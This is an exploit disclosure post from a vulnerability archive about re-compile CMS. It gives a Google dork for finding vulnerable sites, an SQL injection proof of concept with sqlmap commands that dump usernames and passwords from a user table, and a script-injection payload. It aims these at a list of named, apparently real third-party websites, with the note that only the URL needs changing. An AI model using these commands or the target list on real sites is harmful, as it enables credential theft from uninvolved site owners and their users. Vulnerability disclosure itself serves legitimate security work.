re-compile CMS - Multiple Vulnerabilities

2015.11.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : re-compile CMS - Multiple Vulnerabilities # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.re-compile.com/ # Google Dork : inurl:/index.php?pageID=dp:: # Date: 2015/11/25 # ###################### # #SQL injection : # #http://www.eXasa.gr/index.php?pageID=dp::445' # #sqlmap -u http://www.eaXsa.gr/index.php?pageID=dp::445 -D c4_themechefDB -T xusers -C name,pass --dump #sqlmap -u http://www.androXmeda-pension.com/index.php?pageID=dp::278 -D c4_themechefDB -T xusers -C name,pass --dump # #Only change Url D: # #Xss : # #http://www.eXasa.gr/index.php?pageID=dp::445"><script>alert("Mobham")</script> # #Demo: # #http://www.andXromeda-pension.com/index.php?pageID=dp::278 #http://www.hjXi.gr/index.php?pageID=dp::169 #http://www.anapXlasis4u.gr/index.php?pageID=dp::235 #http://www.rex-hotel.Xgr/index.php?pageID=dp::384 #http://www.villa-marXo.gr/index.php?pageID=dp::503 #vxintaropoulou94fxy.themechef.gr/index.php?pageID=dp::438' # # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top